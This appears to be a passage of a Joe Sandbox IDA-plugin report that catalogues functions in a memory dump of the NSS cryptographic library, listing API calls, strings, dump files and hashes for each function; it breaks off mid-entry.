Instruction Fuzzy Hash: BC0144B1A102106BE7318F26FD09BC7B7A1EF50318F005435E89D86B23E232F81887D2

Function 6C732D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C735B40: PR_GetIdentitiesLayer.NSS3 ref: 6C735B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C732D9C

Part of subcall function 6C74C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C74C2BF

PR_EnterMonitor.NSS3(?), ref: 6C732DB2
PR_EnterMonitor.NSS3(?), ref: 6C732DCF
PR_ExitMonitor.NSS3(?), ref: 6C732DF2
PR_ExitMonitor.NSS3(?), ref: 6C732E0B

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction ID: 6284d93251676387e001293d74db9e77a78b7d5938fa72dc4c0a809d7e141ebc
Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction Fuzzy Hash: 5A01C8B1A502106BE6309F26FD0EBC7B7A5EF51318F005435E85D86B13D632F81986D2

Function 6C6CAE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 6C6B3090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6CAE42), ref: 6C6B30AA
Part of subcall function 6C6B3090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6B30C7
Part of subcall function 6C6B3090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C6B30E5
Part of subcall function 6C6B3090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6B3116
Part of subcall function 6C6B3090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C6B312B
Part of subcall function 6C6B3090: PK11_DestroyObject.NSS3(?,?), ref: 6C6B3154
Part of subcall function 6C6B3090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6B317E

SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C6A99FF,?,?,?,?,?,?,?,?,?,6C6A2D6B,?), ref: 6C6CAE67
SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C6A99FF,?,?,?,?,?,?,?,?,?,6C6A2D6B,?), ref: 6C6CAE7E
SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C6A2D6B,?,?,00000000), ref: 6C6CAE89
PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C6A2D6B,?,?,00000000), ref: 6C6CAE96
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C6A2D6B,?,?), ref: 6C6CAEA3

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
String ID:
API String ID: 754562246-0
Opcode ID: 092156ea692a0c445b025cff4c7b295e96d634545ba1d270bce72c63b5015085
Instruction ID: 7b20904850116d28f8022055f6a2ed6035034c12182c957cf405b997b641c5b0
Opcode Fuzzy Hash: 092156ea692a0c445b025cff4c7b295e96d634545ba1d270bce72c63b5015085
Instruction Fuzzy Hash: C701A466B4411057E701926CAC85AEB31D9CB8B65DF080431E905D7B43F625DD1753EF

Function 6C7B0930 Relevance: 7.5, APIs: 5, Instructions: 45fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,00000000,?,6C7B0C83), ref: 6C7B094F
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6C7B0C83), ref: 6C7B0974
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C7B0983
_PR_MD_UNLOCK.NSS3(?,?,6C7B0C83), ref: 6C7B099F
OutputDebugStringA.KERNEL32(?,?,6C7B0C83), ref: 6C7B09B2

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: CriticalDebugEnterOutputSectionStringfflushfwrite
String ID:
API String ID: 1872382454-0
Opcode ID: 68eac35214c74f45de326170798fa4d5169f145291a0229dd9d0b386a7f0898f
Instruction ID: e8aa383a9e3921f214902a61ffc287d1f49de9fc16ab02de9887b1281e79a6b4
Opcode Fuzzy Hash: 68eac35214c74f45de326170798fa4d5169f145291a0229dd9d0b386a7f0898f
Instruction Fuzzy Hash: 94018CB43012408FDF20AF28CD8AB553BB8AB4332DF08027DF8A593752D735E850CA91

Function 6C7BADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6C7BA6D8), ref: 6C7BAE0D
free.MOZGLUE(?), ref: 6C7BAE14
DeleteCriticalSection.KERNEL32(6C7BA6D8), ref: 6C7BAE36
free.MOZGLUE(?), ref: 6C7BAE3D
free.MOZGLUE(00000000,00000000,?,?,6C7BA6D8), ref: 6C7BAE47

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: f21f3c07b95a50e912b440277ee41cd32c2d66a5c44eb87db7cc2e5626a57ad4
Instruction ID: 522b0bba08755fd9482d9f58ec0411b68710ae4e983d9aee5e0ae82f3d68a0ac
Opcode Fuzzy Hash: f21f3c07b95a50e912b440277ee41cd32c2d66a5c44eb87db7cc2e5626a57ad4
Instruction Fuzzy Hash: D0F09675201A01A7CA20AF68E949957777CBF86776714033CF53A93980D731F126C7D5

Function 6C6388D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(00000000,00000000,01DC7D83), ref: 6C638990

Strings

@zdl, xrefs: 6C638A31

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: memset
String ID: @zdl
API String ID: 2221118986-2795759991
Opcode ID: dd98de803b805b6b960435f3c1ac3e3308a4a90f9453981baced50bbdf2dc974
Instruction ID: 940bfa0a1345c9ffdaa2441760eb0b6facd19a2f67adab153597d680b163e980
Opcode Fuzzy Hash: dd98de803b805b6b960435f3c1ac3e3308a4a90f9453981baced50bbdf2dc974
Instruction Fuzzy Hash: 66510871A057919FC704CF28C5946A6BBF0BF59308B24A29EC8884BB13D331F596CBE5

Function 6C636C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C636D36

Strings

database corruption, xrefs: 6C636D2A
%s at line %d of [%.10s], xrefs: 6C636D2F
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C636D20

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 3deb3f1eca88ed2e65731743b7b35290a02b22f262d49cf4dbda0401fe9ea1fc
Instruction ID: a3b8527a5885fe44aa50683eceac48db927ee6f1a4c3a1d967ae5936854fdd22
Opcode Fuzzy Hash: 3deb3f1eca88ed2e65731743b7b35290a02b22f262d49cf4dbda0401fe9ea1fc
Instruction Fuzzy Hash: D12121306003159BC311CF1AD841B9AB7F6BF85308F24A52CD84D9BF51E7B0F9488B9A

Function 6C76CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6C76CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C76CC7B), ref: 6C76CD7A
Part of subcall function 6C76CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C76CD8E
Part of subcall function 6C76CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C76CDA5
Part of subcall function 6C76CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C76CDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C76CCB5
memcpy.VCRUNTIME140(6C8014F4,6C8002AC,00000090), ref: 6C76CCD3
memcpy.VCRUNTIME140(6C801588,6C8002AC,00000090), ref: 6C76CD2B

Part of subcall function 6C689AC0: socket.WSOCK32(?,00000017,6C6899BE), ref: 6C689AE6
Part of subcall function 6C689AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C6899BE), ref: 6C689AFC

Part of subcall function 6C690590: closesocket.WSOCK32(6C689A8F,?,?,6C689A8F,00000000), ref: 6C690597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6C76CCB0

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: 10b152304629d3e84e03aa6aeba7741e69bc329ee91073db7d7b195e7d734c90
Instruction ID: 441bfae084a07d83e0ea9db7606c7d04c04c35819640aa88b79459d42f526fba
Opcode Fuzzy Hash: 10b152304629d3e84e03aa6aeba7741e69bc329ee91073db7d7b195e7d734c90
Instruction Fuzzy Hash: 9F113DB1B012409FEB209F6A9E4B7423AA8974732CF14143DE506AFB41E771D444CBD5

Function 6C62A8E0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 6C75A480: _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C77C3A2,?,?,00000000,00000000), ref: 6C75A528
Part of subcall function 6C75A480: sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C75A6E0

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014576,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C62A94F

Strings

database corruption, xrefs: 6C62A943
%s at line %d of [%.10s], xrefs: 6C62A948
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C62A939

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: cc25c0fde3c9c2f571920aea2732da7e8f41f802e9d53e00b5676b144c42daa7
Instruction ID: cf4bb241ebe0883771b5a450e59ceee5670d2657e1f69f3d4bff2c2c88500424
Opcode Fuzzy Hash: cc25c0fde3c9c2f571920aea2732da7e8f41f802e9d53e00b5676b144c42daa7
Instruction Fuzzy Hash: 3B019931E002085BD3008A7AED05BABB3F4AB49308F464439E98D57E41E770BD088B94

Function 6C6B8850 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C6C0715), ref: 6C6B8859
PR_NewLock.NSS3 ref: 6C6B8874

Part of subcall function 6C7698D0: calloc.MOZGLUE(00000001,00000084,6C690936,00000001,?,6C69102C), ref: 6C7698E5

PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C6B888D

Strings

NSS, xrefs: 6C6B8887

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: calloc$ArenaInitLockPool
String ID: NSS
API String ID: 2230817933-3870390017
Opcode ID: f7acb290ce0b72935fdd5e8ea20c659bf9ce300ae66c5dfcc9a12b09551f8d66
Instruction ID: 63bea97f34f76cae47c5e286d3230d193b433c4fa5e9818928d4d324e73b04e7
Opcode Fuzzy Hash: f7acb290ce0b72935fdd5e8ea20c659bf9ce300ae66c5dfcc9a12b09551f8d66
Instruction Fuzzy Hash: 6BF09C56E4152123F51012596D0AB8665985F5675EF044035E90CB7FC2EA62952883FA

Function 6C74A890 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,00000000,?,6C735F25,?,?,?,?,?,?,?,?,?,6C73AAD4), ref: 6C74A8A3

Part of subcall function 6C6EADC0: TlsGetValue.KERNEL32(?,6C6CCDBB,?,6C6CD079,00000000,00000001), ref: 6C6EAE10
Part of subcall function 6C6EADC0: EnterCriticalSection.KERNEL32(?,?,6C6CCDBB,?,6C6CD079,00000000,00000001), ref: 6C6EAE24
Part of subcall function 6C6EADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C6CD079,00000000,00000001), ref: 6C6EAE5A
Part of subcall function 6C6EADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C6CCDBB,?,6C6CD079,00000000,00000001), ref: 6C6EAE6F
Part of subcall function 6C6EADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C6CCDBB,?,6C6CD079,00000000,00000001), ref: 6C6EAE7F
Part of subcall function 6C6EADC0: TlsGetValue.KERNEL32(?,6C6CCDBB,?,6C6CD079,00000000,00000001), ref: 6C6EAEB1
Part of subcall function 6C6EADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C6CCDBB,?,6C6CD079,00000000,00000001), ref: 6C6EAEC9

PK11_FreeSymKey.NSS3(?,00000000,?,6C735F25,?,?,?,?,?,?,?,?,?,6C73AAD4), ref: 6C74A8BA
SECITEM_ZfreeItem_Util.NSS3(%_sl,00000000,00000000,?,6C735F25,?,?,?,?,?,?,?,?,?,6C73AAD4), ref: 6C74A8CF

Strings

%_sl, xrefs: 6C74A894, 6C74A8CE

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValue$Item_UnlockUtilZfreefreememset
String ID: %_sl
API String ID: 2877228265-2438917851
Opcode ID: 853ca080e675da8d164a39caa672c2364cdd5ffa02c4c4277b396ebe2f9321ef
Instruction ID: a6cb2d64bd8358ac60dca9b5e48dc88057442eb5acd019d278ecd4aa3ba28297
Opcode Fuzzy Hash: 853ca080e675da8d164a39caa672c2364cdd5ffa02c4c4277b396ebe2f9321ef
Instruction Fuzzy Hash: BCF0E5B2E0171897EA119A16EC00B9373ECAB0166DF05C475EC2A9BF42E331F81587D5

Function 6C72A9F0 Relevance: 6.2, APIs: 4, Instructions: 165COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFD074,00000000), ref: 6C72AA23

Part of subcall function 6C71A2F0: PR_SetError.NSS3(00000000,00000000), ref: 6C71A328

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C72AB45
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C72AB96
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C72ABEA

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Error$Item_Util$CopyZfree
String ID:
API String ID: 3824302834-0
Opcode ID: ff0968eac7b98876ed0abe4eee9685ea30153b145284c4826f6389162e63bba1
Instruction ID: eab1ab7d1d6928150ef0127c8e03e0628eaaf383de363c647ca9ce3d350c6360
Opcode Fuzzy Hash: ff0968eac7b98876ed0abe4eee9685ea30153b145284c4826f6389162e63bba1
Instruction Fuzzy Hash: 25512931A40219AFEB208B10DE4AFDA7774FF05728F144170F9087B691E775AA98CBD1

Function 6C72AC80 Relevance: 6.1, APIs: 4, Instructions: 126COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFD074,00000000), ref: 6C72AD13
memcmp.VCRUNTIME140(?,?,?), ref: 6C72AD65
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C72AD95
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C72ADC8

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Item_Util$CopyErrorZfreememcmp
String ID:
API String ID: 2638228310-0
Opcode ID: c08ee8343e2b55920d008becde78cab3e1ed67640ff34f5df2e2b888e352b9d3
Instruction ID: 7328e7f93d6d69270e2b1d6b0d61e25646b64fa904273fa1793b2b297f552eef
Opcode Fuzzy Hash: c08ee8343e2b55920d008becde78cab3e1ed67640ff34f5df2e2b888e352b9d3
Instruction Fuzzy Hash: 7641DF71A00219ABDB10CB65DD89FEEB3B8EF45328F180125EC14AB781E734A949C6A1

Function 6C71CF00 Relevance: 6.1, APIs: 4, Instructions: 118COMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6C71D01E

Part of subcall function 6C6EE550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6EE5A0

PK11_FreeSymKey.NSS3(00000000), ref: 6C71D055

Part of subcall function 6C6EADC0: TlsGetValue.KERNEL32(?,6C6CCDBB,?,6C6CD079,00000000,00000001), ref: 6C6EAE10
Part of subcall function 6C6EADC0: EnterCriticalSection.KERNEL32(?,?,6C6CCDBB,?,6C6CD079,00000000,00000001), ref: 6C6EAE24
Part of subcall function 6C6EADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C6CD079,00000000,00000001), ref: 6C6EAE5A
Part of subcall function 6C6EADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C6CCDBB,?,6C6CD079,00000000,00000001), ref: 6C6EAE6F
Part of subcall function 6C6EADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C6CCDBB,?,6C6CD079,00000000,00000001), ref: 6C6EAE7F
Part of subcall function 6C6EADC0: TlsGetValue.KERNEL32(?,6C6CCDBB,?,6C6CD079,00000000,00000001), ref: 6C6EAEB1
Part of subcall function 6C6EADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C6CCDBB,?,6C6CD079,00000000,00000001), ref: 6C6EAEC9

PK11_PubUnwrapSymKey.NSS3(?,00000000,6C71CC55,00000107,00000000), ref: 6C71D079
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C71D08C

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: K11_$CriticalEnterErrorSectionValue$DeriveFreeUnlockUnwrapWithfreememset
String ID:
API String ID: 324975836-0
Opcode ID: 22193d1b4db2f88221b9321e6c9362352058531fdf2346b09d17b478d9c76cc7
Instruction ID: e41db4679e4226fe2f26d493e305095625afc561c87ab02d690244aa47fe7c55
Opcode Fuzzy Hash: 22193d1b4db2f88221b9321e6c9362352058531fdf2346b09d17b478d9c76cc7
Instruction Fuzzy Hash: 23417DB1905219DFE7108F15DD40BA9B7F5FF48308F0586AAE90CA7741E331AA86CF95

Function 6C7BA860 Relevance: 6.1, APIs: 4, Instructions: 111COMMON

Download Yara Rule

APIs

Part of subcall function 6C7BA690: calloc.MOZGLUE(00000001,00000044,?,?,?,?,6C7BA662), ref: 6C7BA69E
Part of subcall function 6C7BA690: PR_NewCondVar.NSS3(?), ref: 6C7BA6B4

